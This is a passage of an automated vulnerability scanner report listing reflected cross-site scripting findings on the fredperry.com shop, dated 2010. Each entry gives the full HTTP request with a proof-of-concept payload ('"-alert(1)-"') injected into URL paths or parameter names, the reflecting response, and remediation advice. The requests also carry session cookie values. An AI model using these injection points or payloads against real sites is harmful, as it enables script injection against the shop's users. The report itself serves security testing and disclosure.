Set-Cookie: frontend=u06s68bsfnbfrbev1v8hrviv00; expires=Tue, 09-Nov-2010 17:15:06 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition1b9eb"-alert(1)-"50f709e851f/women/trousers/");
//]]>
...[SNIP]...

1.199. http://www.fredperry.com/limited-edition/women/trousers/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/trousers/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b902"-alert(1)-"e78c997e91a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women1b902"-alert(1)-"e78c997e91a/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1u5sk21vdignd9qge2jro4ab25; expires=Tue, 09-Nov-2010 17:15:34 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women1b902"-alert(1)-"e78c997e91a/trousers/");
//]]>
...[SNIP]...

1.200. http://www.fredperry.com/limited-edition/women/trousers/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/trousers/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3aa1"-alert(1)-"c696673324a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/trouserse3aa1"-alert(1)-"c696673324a/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=v2n0dgimikcflarir6k9fetlc1; expires=Tue, 09-Nov-2010 17:15:50 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/trouserse3aa1"-alert(1)-"c696673324a/");
//]]>
...[SNIP]...

1.201. http://www.fredperry.com/limited-edition/women/trousers/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/trousers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 538dd"-alert(1)-"efb610e9ca5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/trousers/?538dd"-alert(1)-"efb610e9ca5=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=dehbjnf11amksjieq7m3vnflo6; expires=Tue, 09-Nov-2010 17:14:19 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/trousers/?538dd"-alert(1)-"efb610e9ca5=1");
//]]>
...[SNIP]...

1.202. http://www.fredperry.com/limited-edition/women/woven-shirts/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/woven-shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 319c8"-alert(1)-"f02ad1cb55f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition319c8"-alert(1)-"f02ad1cb55f/women/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=rigtgilqb83fphgid5aqj3mvp0; expires=Tue, 09-Nov-2010 17:19:43 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition319c8"-alert(1)-"f02ad1cb55f/women/woven-shirts/");
//]]>
...[SNIP]...

1.203. http://www.fredperry.com/limited-edition/women/woven-shirts/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/woven-shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3421"-alert(1)-"f894b1a62ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/womenc3421"-alert(1)-"f894b1a62ca/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=j9893l7sb023k0sn5sgpfqtaf3; expires=Tue, 09-Nov-2010 17:20:07 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/womenc3421"-alert(1)-"f894b1a62ca/woven-shirts/");
//]]>
...[SNIP]...

1.204. http://www.fredperry.com/limited-edition/women/woven-shirts/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/woven-shirts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48e5d"-alert(1)-"0ff88538cd5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/woven-shirts48e5d"-alert(1)-"0ff88538cd5/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ci5qr6rsv2m15begkqb1alv0a0; expires=Tue, 09-Nov-2010 17:20:37 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/woven-shirts48e5d"-alert(1)-"0ff88538cd5/");
//]]>
...[SNIP]...

1.205. http://www.fredperry.com/limited-edition/women/woven-shirts/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/woven-shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2c6f"-alert(1)-"871cf1c9b96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/woven-shirts/?d2c6f"-alert(1)-"871cf1c9b96=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=571sncusi8ej2ov466ooejgm27; expires=Tue, 09-Nov-2010 17:18:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/woven-shirts/?d2c6f"-alert(1)-"871cf1c9b96=1");
//]]>
...[SNIP]...

1.206. http://www.fredperry.com/men/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19550"-alert(1)-"81e975f5d42 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men19550"-alert(1)-"81e975f5d42/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 15:59:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=u66nlujlscjb3s1meug2h090a1; expires=Tue, 09-Nov-2010 16:59:03 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men19550"-alert(1)-"81e975f5d42/");
//]]>
...[SNIP]...

1.207. http://www.fredperry.com/men/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15acc"-alert(1)-"28a03843a58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/?15acc"-alert(1)-"28a03843a58=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:58:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=kts7ep6obi0558q58io3rba110; expires=Tue, 09-Nov-2010 16:58:22 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men - F
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/?15acc"-alert(1)-"28a03843a58=1");
//]]>
...[SNIP]...

1.208. http://www.fredperry.com/men/jackets/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/jackets/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 610d1"-alert(1)-"57514bf41f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men610d1"-alert(1)-"57514bf41f7/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:02:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=4920voebp25nvsp534rnbf95g2; expires=Tue, 09-Nov-2010 17:02:02 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men610d1"-alert(1)-"57514bf41f7/jackets/");
//]]>
...[SNIP]...

1.209. http://www.fredperry.com/men/jackets/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/jackets/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53f66"-alert(1)-"a580dc5b08a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/jackets53f66"-alert(1)-"a580dc5b08a/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:02:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=s18c05vpirje707vgd46ji7t64; expires=Tue, 09-Nov-2010 17:02:18 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/jackets53f66"-alert(1)-"a580dc5b08a/");
//]]>
...[SNIP]...

1.210. http://www.fredperry.com/men/jackets/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/jackets/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dba1b"-alert(1)-"17a5fe70f88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/jackets/?dba1b"-alert(1)-"17a5fe70f88=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=g1cqvnmjficp28jpl36upauge2; expires=Tue, 09-Nov-2010 17:00:39 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's J
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/jackets/?dba1b"-alert(1)-"17a5fe70f88=1");
//]]>
...[SNIP]...

1.211. http://www.fredperry.com/men/knitwear/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/knitwear/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a64af"-alert(1)-"3a1a3b3a61c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mena64af"-alert(1)-"3a1a3b3a61c/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:01:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=u37p1ocep3e9f3icao3s3icac4; expires=Tue, 09-Nov-2010 17:01:31 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/mena64af"-alert(1)-"3a1a3b3a61c/knitwear/");
//]]>
...[SNIP]...

1.212. http://www.fredperry.com/men/knitwear/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/knitwear/

Issue detail

